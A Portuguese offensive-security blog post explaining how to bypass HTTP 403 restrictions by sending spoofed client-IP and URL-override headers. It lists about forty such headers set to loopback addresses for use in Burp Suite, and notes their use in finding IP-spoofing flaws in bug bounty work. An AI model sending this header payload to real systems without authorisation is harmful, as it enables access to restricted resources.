403 Bypass
- Gustavo Viana
- Segurança ofensiva
- 17 de janeiro de 2024
O status HTTP 403 Forbidden é usado para indicar que o acesso a um recurso está proibido. Isso geralmente ocorre porque o usuário não possui as permissões necessárias para acessar o recurso. No entanto, existem algumas técnicas que podem ser usadas para contornar essas restrições.
Uma técnica comum é alterar o valor de um cabeçalho HTTP específico. Por exemplo, se o recurso estiver protegido por meio do cabeçalho Client-IP, você pode tentar alterar o valor do cabeçalho para um valor que o servidor aceitará.
Aqui estão alguns exemplos de cabeçalhos HTTP que podem ser usados para contornar restrições de acesso:
Base-Url: 127.0.0.1
Client-IP: 127.0.0.2
Http-Url: 127.0.0.3
Proxy-Host: 127.0.0.4
Proxy-Url: 127.0.0.5
Real-Ip: 127.0.0.6
Redirect: 127.0.0.7
Referer: 127.0.0.8
Referrer: 127.0.0.9
Refferer: 127.0.0.10
Request-Uri: 127.0.0.11
Uri: 127.0.0.12
Url: 127.0.0.13
X-Client-IP: 127.0.0.14
X-Custom-IP-Authorization: 127.0.0.15
X-Forward-For: 127.0.0.16
X-Forwarded-By: 127.0.0.17
X-Forwarded-For-Original: 127.0.0.18
X-Forwarded-For: 127.0.0.19
X-Forwarded-Host: 127.0.0.20
X-Forwarded-Server: 127.0.0.21
X-Forwarded: 127.0.0.22
X-Forwarder-For: 127.0.0.23
X-Host: 127.0.0.24
X-Http-Destinationurl: 127.0.0.25
X-Http-Host-Override: 127.0.0.26
X-Original-Remote-Addr: 127.0.0.27
X-Original-Url: 127.0.0.28
X-Originating-IP: 127.0.0.29
X-Proxy-Url: 127.0.0.30
X-Real-Ip: 127.0.0.31
X-Remote-Addr: 127.0.0.32
X-Remote-IP: 127.0.0.33
X-Rewrite-Url: 127.0.0.34
X-True-IP: 127.0.0.35
X-ProxyUser-Ip: 127.0.0.36
X-ProxyUser-Ip: 127.0.0.37
Cluster-Client-IP: 127.0.0.38
X-Cluster-Client-IP: 127.0.0.39
Por exemplo, caso você esteja utilizando o Burp Suite , basta adicioná-los como cabeçalhos customizados.
Os cabeçalhos acima também são úteis para identificar possíveis problemas ou vulnerabilidades de IP Spoofing, uma vez que algumas aplicações coletam esses cabeçalhos e utilizam-nos em logs ou até mesmo notificações. Esta técnica é amplamente utilizada em programas de Bug Bounty.
Por exemplo, uma aplicação que encontra-se vulnerável, pode notificar um usuário da seguinte maneira:
Olá, usuário.
Percebemos que recentemente o IP 127.0.0.17 acessou sua conta.
Caso não tenha sido você, recomendamos que altere a senha.
Atenciosamente,
Existem outros meios de bypass do HTTP Status Code 403 (Forbidden) e abordaremos nos próximos posts!
Por fim, agradecemos a leitura e esperamos que este post tenha te ajudado de alguma maneira! Caso tenha alguma dúvida, entre em contato conosco pelo Telegram , Facebook ou Instagram ! Veja mais posts no IronLinux !
